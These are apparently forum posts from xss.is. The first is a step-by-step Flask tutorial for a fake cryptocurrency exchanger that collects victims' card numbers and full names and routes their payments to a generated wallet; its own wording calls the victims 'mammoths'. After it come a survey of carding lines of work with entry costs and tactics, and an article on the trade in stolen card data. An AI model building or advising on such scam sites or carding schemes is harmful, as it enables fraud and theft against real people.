Почему папку нужно называть именно "templates"? Папку необходимо называть
именно так, потому что в Flask по умолчанию все HTML файлы будут искать именно
в этой папке. Конечно, можно принудительно назначить другое название, но
называть папку "templates" - это общепринятый обычай. Все к этому привыкли, и
это уже стандарт. Замена названия может в дальнейшем запутать людей, которые
могут работать над проектом в будущем. Так что это правило распространяется не
только на этот проект, а в принципе на все.
После создания index.html нужно что-то вывести для теста на этой странице, чтобы запустить и проверить код, который мы написали.
HTML:Copy to clipboard
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Flask Page</title>
</head>
<body>
<h1>Заскамил мамонта</h1>
</body>
</html>
В данном коде особо пока что нечего разбирать, разве что пару строк.
HTML:Copy to clipboard
Отвечает за определение языка, на котором написан весь наш текст на странице. В основном, это нужно для того, чтобы браузеры корректно предлагали перевод страницы на другой язык.
HTML:Copy to clipboard
Этот title Отвечает за то, какой текст будет отображаться в браузере сверху, где находятся все открытые вкладки.
HTML:Copy to clipboard
Это тело всей нашей страницы, весь код, объекты и т.д нужно писать именно внутри
Минимальная заготовка нашего проекта уже готова, и его можно запустить, чтобы
убедиться, что все работает. Запускаем файл main.py, и если мы видим то же
самое, что на скриншоте, то можем переходить по ссылке на сайт.
Написание конвертера валют
Думаю, для обучения будет достаточно одного биткойна, так как остальные валюты
можно будет добавлять точно так же по аналогии с биткойном.
Для того чтобы конвертировать количество биткойнов в сумму в рублях, нам
потребуется использовать API стороннего сервиса, который хранит данные о ценах
на криптовалюты. Как правило, у подобных сервисов есть свои узлы, и через их
API можно также получать транзакции, но они нам не потребуются. Я буду
использовать CoinGecko, достаточно популярный и удобный сервис.
Сначала я покажу код основного функционала обменника и объясню, что, где и почему написано, а затем уже буду работать над дизайном.
HTML:Copy to clipboard
<!DOCTYPE html>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Обмен криптовалют</title>
</head>
<body>
<h1>Конвертер Биткойна в рубли</h1>
<label for="currency">Выберите валюту:</label>
<select id="currency" name="currency">
<option value="bitcoin">Биткойн</option>
</select>
<br>
<label for="amount">Введите количество:</label>
<input type="text" id="amount" name="amount" onkeyup="convertToRubles()">
<br>
<label for="bank">Выберите банк:</label>
<select id="bank" name="bank">
<option value="sberbank">Сбербанк</option>
<option value="vtb">ВТБ</option>
</select>
<br>
<label for="card_number">Введите номер карты:</label>
<input type="text" id="card_number" name="card_number">
<br>
<label for="card_number">Введите ФИО:</label>
<input type="text" id="fio" name="fio">
<br>
<label id="payment_amount_label" for="payment_amount">Сумма к оплате:</label>
<span id="payment_amount"></span>
<br>
<button>Отправить заявку</button>
<div id="result"></div>
<script>
function convertToRubles() {
var currency = document.getElementById("currency").value;
var amount = parseFloat(document.getElementById("amount").value);
fetch(`https://api.coingecko.com/api/v3/simple/price?ids=${currency}&vs_currencies=rub`)
.then(response => response.json())
.then(data => {
var exchangeRate = data[currency].rub;
var rubles = amount * exchangeRate;
document.getElementById("payment_amount").innerHTML = rubles.toFixed(2) + " рублей";
})
.catch(error => console.error('Ошибка:', error));
}
document.getElementById("payment_amount_label").innerHTML = "Сумма к оплате:";
</script>
</body>
</html>
HTML:Copy to clipboard
Это селектор (выпадающий список). Внутри селектора находится список объектов для выбора, в нашем случае это банки "Сбербанк" и "ВТБ". Чтобы добавить ещё банки, понадобится добавить ещё с value значением названия банка. То же самое можно сделать и с выбором криптовалюты.
HTML:Copy to clipboard
Это поле ввода для номера карты. Если необходимо добавить сбор ещё каких-то данных от пользователя, то используем .
HTML:Copy to clipboard
Это кнопка, которая пока что не имеет никакого функционала, но в дальнейшем мы ее обязательно будем использовать для отправки заявки к нам на сервер и записи всех данных в нашу базу данных (которую мы пока что не создали).
Делаем нашу страницу конвертера модной и молодежной
Для начала нам нужно создать файл CSS формата, куда в дальнейшем будем
записывать стили для наших объектов.
Создаем папку "static", а внутри этой папки нажимаем на "New/File". Когда будете указывать название файла, обязательно укажите формат ".css", так как PyCharm не может сам это определить. Почему папку нужно назвать "static"? Ситуация та же самая, что и с "templates" — это название по умолчанию, используемое, и я также не советую его менять.
Теперь нам нужно внутри
указать путь до нашего css файла:HTML:Copy to clipboard
<link rel="stylesheet" href="{{ url_for('static', filename='index.css') }}">
Затем нам нужно зайти в наш css файл и вписать простейшие стили
CSS:Copy to clipboard
body{
background: #2d3238;
color: white;
}
Для нормального внешнего вида нужно ещё многое добавить, различные div блоки, стили и т.д., так что объяснять я все полностью не буду, просто укажу комментарии в коде, т.к. объяснение какой стиль за что отвечает и почему я где-то поставил дополнительные div блоки, очень долго. Моя цель - показать основы и добавить весь необходимый функционал. Но некоторые вещи я все же уточню.
CSS:Copy to clipboard
/* Подключение кастомного шрифта */
@font-face {
font-family: 'Evolve'; /* Название кастомного шрифта */
src: url('fonts/Evolve.otf') format('truetype'); /* Путь к файлу шрифта */
}
body{
font-family: 'Evolve', sans-serif; /* Шрифт */
}
Spoiler: Внешний вид страницы конвертера
Spoiler: HTML и css код
CSS:Copy to clipboard
.exchanger_form{
/* Подключение кастомного шрифта */
@font-face {
font-family: 'Evolve'; /* Название кастомного шрифта */
src: url('fonts/Evolve.otf') format('truetype'); /* Путь к файлу шрифта */
}
body{
background: #2d3238;
color: white;
font-family: 'Evolve', sans-serif; /* Шрифт */
}
.exchanger_form{
width: 250px; /* Ширина блока */
height: 425px; /* Высота блока */
background: #383c42;
border-radius: 8px;
border: 1px solid #2d3238;
position: absolute; /* Позиционирование */
top: 50%; /* Расположение сверху */
left: 50%; /* Расположение слева */
transform: translate(-50%, -50%); /* Сдвиг блока на половину своей ширины и высоты */
text-align: center; /* Выравнивание текста по центру */
display: flex; /* Отображение как flex-контейнер */
align-items: center; /* Выравнивание элементов по центру */
box-shadow: 0px 0px 10px rgb(0 0 0 / 25%); /* Тень блока */
flex-direction: column; /* Направление элементов в колонку */
justify-content: center; /* Выравнивание контента по центру */
z-index: 2;
}
input{
margin: 1%;
background: #2d3238;
color: white;
border-radius: 4px;
border: 1px solid #196aa5;
font-family: 'Evolve', sans-serif; /* Шрифт */
}
label{
margin: 10px 0px 1px;
display: flex;
}
.main_form{
display: flex;
flex-direction: column;
}
select{
background: #2d3238;
color: white;
border-radius: 4px;
border: 1px solid #196aa5;
font-family: 'Evolve', sans-serif; /* Шрифт */
}
button{
color: white;
background: #64cb99;
border: none;
border-radius: 4px;
width: 200px;
height: 25px;
margin-top: 15px;
font-family: 'Evolve', sans-serif; /* Шрифт */
}
.logo{
width: 150px;
margin-bottom: 25px;
}
.count{
margin: 10px 0px;
display: flex;
flex-direction: column;
align-items: center;
}
.widget{
}
}
HTML:Copy to clipboard
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="{{ url_for('static', filename='index.css') }}">
<title>Обмен криптовалют</title>
</head>
<body>
<div class="widget">
<div style="height: 62px; overflow: hidden; box-sizing: border-box; border-radius: 4px; text-align: right; line-height: 14px; block-size: 62px; font-size: 12px; font-feature-settings: normal; text-size-adjust: 100%; padding: 1px; margin: 0;">
<div style="height: 40px; padding: 0; margin: 0; width: 100%;">
<iframe src="https://widget.coinlib.io/widget?type=horizontal_v2&theme=dark&pref_coin_id=1505&invert_hover=" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border: 0; margin: 0; padding: 0;"></iframe>
</div>
</div>
</div>
<div class="exchanger_form">
<img class="logo" src="static/img/logo.png"/>
<div class="main_form">
<label for="currency">Выберите валюту:</label>
<select id="currency" name="currency">
<option value="bitcoin">Биткойн</option>
</select>
<label for="amount">Введите количество:</label>
<input type="text" id="amount" name="amount" onkeyup="convertToRubles()">
<label for="bank">Выберите банк:</label>
<select id="bank" name="bank">
<option value="sberbank">Сбербанк</option>
<option value="vtb">ВТБ</option>
</select>
<label for="card_number">Введите номер карты:</label>
<input type="text" id="card_number" name="card_number">
<label for="card_number">Введите ФИО:</label>
<input type="text" id="fio" name="fio">
<label class="count" id="payment_amount_label" for="payment_amount">Сумма к оплате:</label>
<span id="payment_amount"></span>
<button>Отправить заявку</button>
<div id="result"></div>
</div>
</div>
<script>
function convertToRubles() {
var currency = document.getElementById("currency").value;
var amount = parseFloat(document.getElementById("amount").value);
fetch(`https://api.coingecko.com/api/v3/simple/price?ids=${currency}&vs_currencies=rub`)
.then(response => response.json())
.then(data => {
var exchangeRate = data[currency].rub;
var rubles = amount * exchangeRate;
document.getElementById("payment_amount").innerHTML = rubles.toFixed(2) + " рублей";
})
.catch(error => console.error('Ошибка:', error));
}
document.getElementById("payment_amount_label").innerHTML = "Сумма к оплате:";
</script>
</body>
</html>
Создание базы данных и запись в нее личных данных мамонтенков
Теперь нам нужно, чтобы при запуске нашей программы создавалась база данных.
Базу данных я буду использовать SQLite. Почему я не буду использовать MySQL?
Для начала, нам нужно перейти к нашему файлу Python, main.py, а затем выполнить следующие действия:
Python:Copy to clipboard
from flask_sqlalchemy import SQLAlchemy
Теперь приступим к созданию базы данных.
Python:Copy to clipboard
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db' # Указываем путь к базе данных SQLite
db = SQLAlchemy(app)
with app.app_context():
db.create_all()
Данный код создает базу данных и таблицы внутри неё, если их ещё нет.
Теперь обозначим, какие таблицы должны быть у нас, и какие столбцы там должны находиться.
Python:Copy to clipboard
class MamontInfo(db.Model):
id = db.Column(db.Integer, primary_key=True)
card = db.Column(db.String(16), nullable=False)
fio = db.Column(db.String(100), nullable=False)
При запуске нашей программы автоматически создается папка "instance", а в ней создается база данных. Папку я не указывал; это снова дефолтный путь.
Далее нам нужно, в первую очередь, добавить функцию, которая будет записывать данные из формы HTML внутрь нашей базы данных.
Python:Copy to clipboard
@app.route('/submit', methods=['POST'])
def submit_form():
if request.method == 'POST':
card_number = request.form['card']
fio = request.form['fio']
new_entry = MamontInfo(card=card_number, fio=fio)
db.session.add(new_entry)
db.session.commit()
return 'Заявка успешно отправлена'
Теперь нам нужно немного изменить наш HTML файл для того, чтобы при нажатии на кнопку вызывалась функция сбора данных из полей и запись этих данных в базу данных. Что именно я сделал?
HTML:Copy to clipboard
<form action="/submit" method="POST">
<div class="main_form">
<label for="currency">Выберите валюту:</label>
<select id="currency" name="currency">
<option value="bitcoin">Биткойн</option>
</select>
<label for="amount">Введите количество:</label>
<input type="text" id="amount" name="amount" onkeyup="convertToRubles()">
<label for="bank">Выберите банк:</label>
<select id="bank" name="bank">
<option value="sberbank">Сбербанк</option>
<option value="vtb">ВТБ</option>
</select>
<label for="card_number">Введите номер карты:</label>
<input type="text" id="card_number" name="card" required>
<label for="fio">Введите ФИО:</label>
<input type="text" id="fio" name="fio">
<label class="count" id="payment_amount_label" for="payment_amount">Сумма к оплате:</label>
<span id="payment_amount"></span>
<button type="submit">Отправить заявку</button>
</div>
</form>
Генерация кошелька на который будут отправляться деньги
Для генерации кошельков я буду использовать библиотеку hdwallet. Библиотека
легкая, и в ней достаточно много монет, так что ее хватит под любое количество
монет, я думаю.
Для начала необходимо создать новый python файл. Я назову его "create_wallets", и не забываем, что нам нужно установить библиотеку командой pip install hdwallet. Теперь переходим в наш созданный файл и вставляем туда этот код:
Python:Copy to clipboard
from hdwallet import HDWallet, BIP44HDWallet, BIP84HDWallet
from typing import Optional
import json
from hdwallet.symbols import BTC
from hdwallet.utils import generate_entropy
# Определение параметров
STRENGTH: int = 128
LANGUAGE: str = "english"
PASSPHRASE: Optional[str] = None
# Генерация новой случайной последовательности
ENTROPY: str = generate_entropy(strength=STRENGTH)
# Определение списка символов криптовалют
CRYPTO_SYMBOLS = [BTC]
PATH_MAPPING = {
BTC: "0'"
}
def create_wallet():
wallets_info = []
# Инициализация и создание кошелька для каждой криптовалюты из списка
for symbol in CRYPTO_SYMBOLS:
# Инициализация HDWallet
hdwallet: HDWallet = HDWallet(symbol=symbol, use_default_path=False)
# Создание кошелька
hdwallet.from_entropy(entropy=ENTROPY, language=LANGUAGE, passphrase=PASSPHRASE)
# Вывод информации о кошельке
print(f"Информация о созданном кошелке {symbol}:")
info_seed = json.dumps(hdwallet.dumps(), indent=4, ensure_ascii=False)
# Десериализация строки info_seed в словарь
info_seed_dict = json.loads(info_seed)
mnemonic = info_seed_dict["mnemonic"]
hdwallet.from_path(path=f"m/44'/{PATH_MAPPING[symbol]}/0'/0/0")
bip_hdwallet: BIP84HDWallet = BIP84HDWallet(symbol=symbol, account=0, change=False, address=0)
bip_hdwallet.from_mnemonic(mnemonic=mnemonic)
address = bip_hdwallet.address()
private_key = hdwallet.private_key()
wallets_info.append({
'symbol': symbol,
'mnemonic': mnemonic,
'address': address,
'private_key': private_key
})
print(f"Мнемоническая фраза: {mnemonic}")
print(f"Адрес: {address}")
print(f"Приватный ключ: {private_key}")
return wallets_info
Теперь рассмотрим некоторые части этого кода, чтобы вам было понятнее, что в нем написано.
Python:Copy to clipboard
create_wallet():
Если кратко, эта функция создает криптовалютные кошельки, используя криптовалюты из словаря CRYPTO_SYMBOLS. Она также генерирует мнемоническую фразу и приватный ключ. После создания кошелька адрес, приватный ключ и мнемоническая фраза сохраняются в виде словаря.
Python:Copy to clipboard
PATH_MAPPING:
В PATH_MAPPING записывается значение, с которым ассоциируется валюта. Это необходимо для получения адреса кошелька в формате BIP84. Например, для биткойна это "m/84'/0'/0'/0/0", а для лайткойна "m/44’/2’/0’/0/0". Таким образом, для BTC используется значение "0'", а для LTC - "2'". Полный список можно найти по следующей ссылке: [ссылка на список криптовалют и соответствующие значения в PATH_MAPPING].
Python:Copy to clipboard
LANGUAGE:
Язык указывается для генерации мнемонических фраз, их можно генерировать даже на китайском языке.
Как сделать генерацию кошельков для нескольких валют
Python:Copy to clipboard
hdwallet.from_path(path=f"m/44'/{PATH_MAPPING[symbol]}/0'/0/0")
bip_hdwallet: BIP84HDWallet = BIP84HDWallet(symbol=symbol, account=0, change=False, address=0)
bip_hdwallet.from_mnemonic(mnemonic=mnemonic)
на эту
Python:Copy to clipboard
hdwallet.from_path(path=f"m/44'/{PATH_MAPPING[symbol]}/0'/0/0")
if symbol == "BTC" or symbol == "LTC":
bip_hdwallet: BIP84HDWallet = BIP84HDWallet(symbol=symbol, account=0, change=False, address=0)
elif symbol == "ETH" or symbol == "TRX":
bip_hdwallet: BIP44HDWallet = BIP44HDWallet(symbol=symbol, account=0, change=False, address=0)
bip_hdwallet.from_mnemonic(mnemonic=mnemonic)
Запись сгенерированного кошелька в базу данных
С генерацией кошельков мы разобрались, теперь нужно добавить запись нашего
кошелька в базу данных. Для этого нам потребуется зайти в main.py и дополнить
его.
Python:Copy to clipboard
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
from create_wallets import create_wallet
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'
db = SQLAlchemy(app)
class MamontInfo(db.Model):
id = db.Column(db.Integer, primary_key=True)
card = db.Column(db.String(16), nullable=False)
fio = db.Column(db.String(100), nullable=False)
class Wallet(db.Model):
id = db.Column(db.Integer, primary_key=True)
coin = db.Column(db.String(50), nullable=False)
mnemonic = db.Column(db.Text, nullable=False)
address = db.Column(db.String(100), nullable=False)
private_key = db.Column(db.String(100), nullable=False)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/submit', methods=['POST'])
def submit_form():
if request.method == 'POST':
card_number = request.form['card']
fio = request.form['fio']
new_entry = MamontInfo(card=card_number, fio=fio)
db.session.add(new_entry)
db.session.commit()
return 'Заявка успешно отправлена'
if __name__ == '__main__':
with app.app_context():
db.create_all()
# Проверяем, есть ли уже записи в таблице Wallet
existing_wallets = Wallet.query.all()
if not existing_wallets: # Если нет записей, то создаем новые кошельки
wallets_info = create_wallet()
for info in wallets_info:
wallet_entry = Wallet(coin=info['symbol'], mnemonic=info['mnemonic'], address=info['address'],
private_key=info['private_key'])
db.session.add(wallet_entry)
db.session.commit()
app.run(debug=True)
Теперь подробнее рассмотрим изменения
Был добавлен новый класс Wallet, в нем указано, с каким названием и с какими столбцами создавать таблицы в базе данных.
Python:Copy to clipboard
if name == 'main':
Была добавлена проверка наличия информации о сгенерированном кошельке в базе данных. Если такой информации нет, то происходит генерация кошелька и запись данных о нем в базу данных.
Создание страницы оплаты
Теперь нам нужно сделать так, чтобы при нажатии на кнопку "Отправить заявку"
открывалась страница с данными для оплаты, а именно:
Для начала нам потребуется получить данные из поля, в которое ввели количество биткойнов. Однако их также нужно куда-то записать. Поэтому для начала нужно снова дописать main.py, чтобы создавался столбец, в который запишется сумма в биткойнах.
Чтобы создать столбец в базе данных, нам нужно найти класс MamontInfo и дописать туда эту строку:
Python:Copy to clipboard
amount = db.Column(db.String(100),nullable=False)
Теперь нам нужно записывать сумму в базу данных, для этого потребуется дописать функцию submit_form
Python:Copy to clipboard
@app.route('/submit', methods=['POST'])
def submit_form():
if request.method == 'POST':
card_number = request.form['card']
fio = request.form['fio']
amount = request.form['amount'] # Получаем введенную сумму
new_entry = MamontInfo(card=card_number, fio=fio, amount=amount) # Добавляем сумму в создаваемую запись
db.session.add(new_entry)
db.session.commit()
return 'Заявка успешно отправлена'
Запись всех необходимых данных мы сделали. Теперь требуется сделать переход на страницу оплаты. Однако перед этим нам нужно создать саму страницу, назовем ее "payments.html", и сразу же создадим для нее CSS файл со стилями, назову его "payments.css".
Далее, чтобы при нажатии на кнопку "Отправить заявку" открывалась страница оплаты и выводились на ней данные, записанные в базу данных, нам нужно обратиться к функции submit_form и изменить ее.
Python:Copy to clipboard
@app.route('/submit', methods=['POST'])
def submit_form():
if request.method == 'POST':
card_number = request.form['card']
fio = request.form['fio']
amount = request.form['amount']
new_entry = MamontInfo(card=card_number, fio=fio, amount=amount)
db.session.add(new_entry)
db.session.commit()
# Получаем данные из таблицы MamontInfo
submitted_data = MamontInfo.query.filter_by(card=card_number, fio=fio, amount=amount).first()
# Получаем адрес кошелька из таблицы Wallet
wallet_entry = Wallet.query.first()
wallet_address = wallet_entry.address
return render_template('payments.html', submitted_data=submitted_data, wallet_address=wallet_address)
Теперь нужно дописать саму страницу оплаты
HTML:Copy to clipboard
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="{{ url_for('static', filename='payments.css') }}">
<title>Оплата</title>
</head>
<body>
<p>Номер карты: {{ submitted_data.card }}</p>
<p>ФИО: {{ submitted_data.fio }}</p>
<p>Сумма: {{ submitted_data.amount }}</p>
<p>Адрес кошелька из базы данных: {{ wallet_address }}</p>
</body>
</html>
Теперь нужно настроить стили страницы, чтобы она выглядела как нормальный сайт. Для этого потребуется, как минимум, добавить все выводимые данные в div блок, а затем назначить стили в CSS файле, который мы создавали. Подробно на этом не останавливаясь, просто предоставлю готовый код ниже.
Spoiler: Внешний вид страницы оплаты
Spoiler: Код и стили страницы оплаты
HTML:Copy to clipboard
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="{{ url_for('static', filename='payments.css') }}">
<title>Оплата</title>
</head>
<body>
<div class="payments_form">
<img class="logo" src="static/img/logo.png"/>
<div class="main_form">
<p>Сумма: {{ submitted_data.amount }} BTC</p>
<div class="wallet" onclick="copyToClipboard('{{ wallet_address }}')" title="Click to copy"><p class="text_info">Кошелек: {{ wallet_address[:15] ~ '...' }}</p></div>
</div>
</div>
<script>
function copyToClipboard(text) {
const el = document.createElement('textarea');
el.value = text;
document.body.appendChild(el);
el.select();
document.execCommand('copy');
document.body.removeChild(el);
alert('Copied to clipboard');
}
</script>
</body>
</html>
CSS:Copy to clipboard
/* Подключение кастомного шрифта */
@font-face {
font-family: 'Evolve'; /* Название кастомного шрифта */
src: url('fonts/Evolve.otf') format('truetype'); /* Путь к файлу шрифта */
}
body{
background: #2d3238;
color: white;
font-family: 'Evolve', sans-serif; /* Шрифт */
}
.payments_form{
width: 250px; /* Ширина блока */
height: 425px; /* Высота блока */
background: #383c42;
border-radius: 8px;
border: 1px solid #2d3238;
position: absolute; /* Позиционирование */
top: 50%; /* Расположение сверху */
left: 50%; /* Расположение слева */
transform: translate(-50%, -50%); /* Сдвиг блока на половину своей ширины и высоты */
text-align: center; /* Выравнивание текста по центру */
display: flex; /* Отображение как flex-контейнер */
align-items: center; /* Выравнивание элементов по центру */
box-shadow: 0px 0px 10px rgb(0 0 0 / 25%); /* Тень блока */
flex-direction: column; /* Направление элементов в колонку */
justify-content: center; /* Выравнивание контента по центру */
z-index: 2;
}
.logo{
width: 150px;
margin-bottom: 25px;
}
.main_form{
display: flex;
flex-direction: column;
align-items: flex-start;
background: #2d3238;
border-radius: 8px;
padding: 5px;
font-size: 14px;
width: 225px;
}
p{
margin: 5px
}
Генерация QR Code который будет хранить адрес кошелька
Теперь необходимо создать генерацию QR Code и выводить его на странице оплаты.
Для этого создадим новый python файл с названием "qr_generate.py", сразу же
устанавливаем pip install qrcode и вставляем код в наш python файл
Python:Copy to clipboard
import qrcode
import base64
import io
def qr_gen(text):
QRcode = qrcode.QRCode(
error_correction=qrcode.constants.ERROR_CORRECT_H
)
QRcode.add_data(text)
QRcode.make()
QRcolor = '#02c895'
QRimg = QRcode.make_image(
fill_color=QRcolor, back_color="#383c42").convert('RGB')
img_bytes = io.BytesIO()
QRimg.save(img_bytes, format='PNG')
img_base64 = base64.b64encode(img_bytes.getvalue()).decode('utf-8')
print('Генерация QR Code прошла успешно')
return img_base64
Теперь рассмотрим несколько строк из этого кода
Теперь нам нужно выводить сгенерированный QR код на страницу оплаты.
Python:Copy to clipboard
qr_code_base64 = qr_gen(wallet_address)
Python:Copy to clipboard
return render_template('payments.html', submitted_data=submitted_data, wallet_address=wallet_address, qr_code_base64=qr_code_base64)
HTML:Copy to clipboard
<img class="qr" src="data:image/png;base64, {{ qr_code_base64 }}" alt="QR Code">
Spoiler: Внешний вид страницы оплаты с QR Code
Адаптация сайта под телефоны.
Для адаптации сайта под разные разрешения экрана существует множество
различных способов, таких как Bootstrap, использование свойств min-width и
max-width или медиа-запросы. Однако после испытания всех этих вариантов мне
больше всего понравился подход через медиа-запросы. Давайте рассмотрим, как
работать с медиа-запросами на примере страницы конвертера.
Заходим на страницу конвертера, нажимаем F12, затем включаем режим эмуляции
устройства и выбираем устройство для эмуляции размера экрана.
Лично меня не устраивает то, что блок div, в котором находятся все элементы, такой узкий, поэтому сейчас будем это исправлять.
Для начала зайдем в css файл этой страницы и введем это:
CSS:Copy to clipboard
@media only screen and (max-width: 415px){
}
max-width: 415px означает, что когда ширина экрана будет 415 пикселей или меньше, то будут применяться новые стили к объектам.
CSS:Copy to clipboard
@media only screen and (max-width: 415px){
.exchanger_form{
width: 325px;
}
}
Теперь, если мы через f12 посмотрим на стили нашего объекта то увидим что
основной размер ширины зачеркнут а за место него активен тот что мы указали в
медиа запросе
После того как я добавил все нужные объекты внутрь медиа-запроса, получился такой код:
Python:Copy to clipboard
@media only screen and (max-width: 415px){
.exchanger_form{
width: 325px;
height: 525px;
}
.logo {
width: 200px;
}
label {
font-size: 20px;
}
select {
font-size: 17px;
width: 285px;
height: 30px;
}
input {
font-size: 17px;
width: 276px;
height: 24px;
}
button {
width: 285px;
height: 30px;
margin-top: 15px;
font-size: 20px;
}
}
Spoiler: Конечный результат адаптации
Заключение.
На этом моя статья подходит к концу. Материала получилось больше, чем я
ожидал. Я попытался сделать его как можно более компактным и вырезал несколько
тысяч символов, но при этом постарался оставить все шаги в разработке, от
создания проекта до конечного результата.
Цель этой статьи была в том, чтобы показать, как реализуются подобного рода проекты. Это, конечно, не законченный проект, а лишь учебный материал, чтобы вы могли на его основе создать свой собственный проект.
Статья написана CognitoInc специально для форума xss.is
Привет. Решил сделать небольшой обзор направлений для работы в кардинге с плюсами и минусами, порогом входа. Думаю будет любопытно для тех кто хотел давно начать работу, но почему-то откладывал.
СС/картон
Старо как мир. Но в связи с закрытием большинства нормальных шопов за последние 3-4 года качественный материал покупать стало сложнее. А без знания проходных бинов особо делать нечего. Если все-таки планируете выбрать это направление, я бы посоветовал начать с привязки СС к брут аккаунтам шопов с последующим вбивом. Вполне рабочая история и аккаунты достать несложно. Либо бить жесткий неликвид на потоке, его скупают отлично и бьется он нормально. К плюсам этого направления можно, наверное, отнести относительно простую настройку системы, вполне хватает антика и нормальных прокси. Порог входа на все про все от 800$ .
Логи БА
Очень даже профитное направление с одним жирным НО. Покупные логи редко бывают хорошего качества. Хотя много кто берет в каких-нибудь секрет-румах и даже вполне неплохо их отрабатывает. С другой стороны логи БА есть часто и у тех кто льет YT и найти у кого брать их в отработку не так сложно при должном желании. Тут главное постоянство, потому что периодически попадаются интересные банки в которых легко послать ваеры на десятки К. А без ежедневной практики тяжело будет находится в материале. Но основа слива с логов Ба это конечно же ACH + bill pay. Да, банков много, но не стоит этого пугаться, потому что у многих фрод одинаков и уже наперед знаешь сколько можно слить. Из плюсов - не сможете регнуть приемку под слив, всегда масса народу, кто приемку предоставит. Для работы хватит антика + прокси. Порог входа от 1500-2000$.
Кредитки/лоаны
Даже школота с лолза отлично регает кредитки пачками, направление прямо скажем не сложное. Из плюсов - дешевый вход, начать можно даже с 500 баксов. Из минусов - потребуется много усидчивости, потому что здесь можно вывозить только потоком. Кредиток которые регаются онлайн великое множество и не стоит как все долбить тот же капоне и диск, а потом бегать искать обнал, потому что никто их толком не берет. Лоаны чуть сложнее история, но если есть толковый прозвон в команде, либо нашли хороший сервис, то можно очень даже неплохо работать под ним. Возьни меньше, суммы больше, но и думать придется тоже больше. По настройке системы здесь есть разные варианты. Советую делать акцент на телефоны, мобильные антики, эмуляторы.
Брут БА
Как по мне направление несколько угасает, особенно после того как с рынка пропали plaid банки. А живые деньги были именно там. Но тем не менее направление профитное, базовое, вечное. Появляются новые конторы для реги, появляются новые интересные банки с долгим чарджем у брутеров. Начать прямо здесь и сейчас можно, но внятные результаты будут не сразу а думаю через месяц-полтора, потому что придется зарегать приличное количество банков и котор, чтобы хорошенько набить руку, но зато потом все становится очень понятно и сможете дальше работать в этом направление хоть 5 лет, хоть 10. Классика потому что. Для работы хватит и антика по началу, но если будет возможность использовать прошитые малинки, телефоны, подмену гео - то это все пойдет на пользу. Вход думаю от 1200-1600 $
**Палка/paypal
**
Думаю заниматься ей не перестали только те, кто с нее в свое время нормально
не заработал. Кто заработал, давно ушли в другие темы, ибо терпения с ней
работать не хватает. Тем не менее это тоже своего рода классика, но если
только планируете начать, я бы с нее не начинал. Есть очень много тематических
чатов в ТГ по теме ПП и если все-таки хочется, советую их посетить. Из плюсов
Пишите о каких направлениях еще рассказать и любые вопросы по этим направлениям. Отвечу тут или в ЛС.
You must have at least 20 message(s) to view the content.
Если у кого то еще имеются, делитесь ?
покупают и Как происходят процессы поставки CC из-за чего очень много ругани, вопросов, поисков адекватного материала и так далее, Вот и решил написать статью, думаю многим будет интересно
Добыча материала: Затраты и сложности
В первой части статьи мы рассмотрим самую важную часть круговорота CC - Добыча материала.
Несмотря на то, что CC материал считается одними из самых дешевых, их добыча представляет собой сложный и затратный процесс. Многие поставщики сталкиваются с вызовом отбить затраты, и, чтобы ускорить продажи, они часто предпочитают продавать материал сразу в несколько шопов. Таким образом, если в шопе большие и быстрые продажи, продав материал в двух разных шопах seller почти не делает возвратов потому что мат хоть и проданный в две руки как правило всё ещё живой. Живой но уже далеко не валидный, Сделать Профит таким матом почти нереально.
Такая многоразовая продажа материала влечет за собой свои трудности. Часто покупатели, приобретая один и тот же материал у разных продавцов, сталкиваются с ситуацией, когда материал уже был проверен (чекер показывает "живой"). Однако, по правилам большинства магазинов, совершивших покупку, покупатель не имеет права требовать возврата То есть по сути покупатель покупает невалидный мат но Чекер показывает что он валидный и бабки он не вернёт.
Проблемы с качеством из-за некомпетентности добытчиков:
Однако не только многоразовая продажа влияет на качество материала. Важным аспектом является и некомпетентность самих добытчиков. Нередко встречаются случаи, когда добытчики умеют добывать но в душе не е*ут что делать с матом и как им пользоваться. Иногда даже, перечекивают весь объем перед выставлением на продажу (Я видел как такой продавец совершенно открыто писал об этом в теме на форуме, при этом он даже не осознаёт что делает ). Это приводит к потере валидности материала, и, к сожалению, даже опытные добытчики иногда не осознают то -что они убивают мат. А все объяснения что чекер какой-то там особенный и не убивает материал, это всё бред!
Таким образом, на первом уровне цепочки поставок материала CC часто возникает серьезное ухудшение общего качества продукции, вызванное многоразовой продажей, неопытностью добытчиков и некомпетентным обращением с материалом.
То есть уже на этом уровне, жадность и незнание делают из материала просто циферки, хотя жадность будет на всех уровнях….
Перекупка материала: Между прозрачностью и риском
Вторая часть нашей статьи касается тех, кто занимается перекупкой материала. На некоторых форумах мы можем встретить продавцов, которые предпочитают не связываться с магазинами и предлагают добытые базы оптом.
Интересно отметить, что такие продавцы, как правило, предлагают базы не очень большого объема, что может свидетельствовать о их самостоятельной добыче, учитывая трудности и затраты на этот процесс. На самом деле очень редко можно встретить базы по несколько тысяч карт, Не говоря уже о десятках тысяч или сотнях когда мы говорим о хорошем качестве
Я ни в коем случае не хочу сказать что все продавцы плохие и качество у них г*вно и так далее. Многие из них честно добывают и продают материал, сохраняя высокие стандарты. Однако, следует признать, что количество таких честных продавцов, возможно, не столь велико как хотелось бы...
Затраты на добычу и риск многоразовой продажи:
Затраты на добычу материала остаются значительными, а учитывая дешевизну баз многие перекупы предпочитают закупать их оптом и продавать в шопы дороже. Это может привести к многоразовой продаже материала (ведь это минимум вторые руки), а также к ситуации, когда перекупы, не особо разбирающиеся в работе с материалом, просто перечекивают базу и выставляют ее на продажу в шопе.
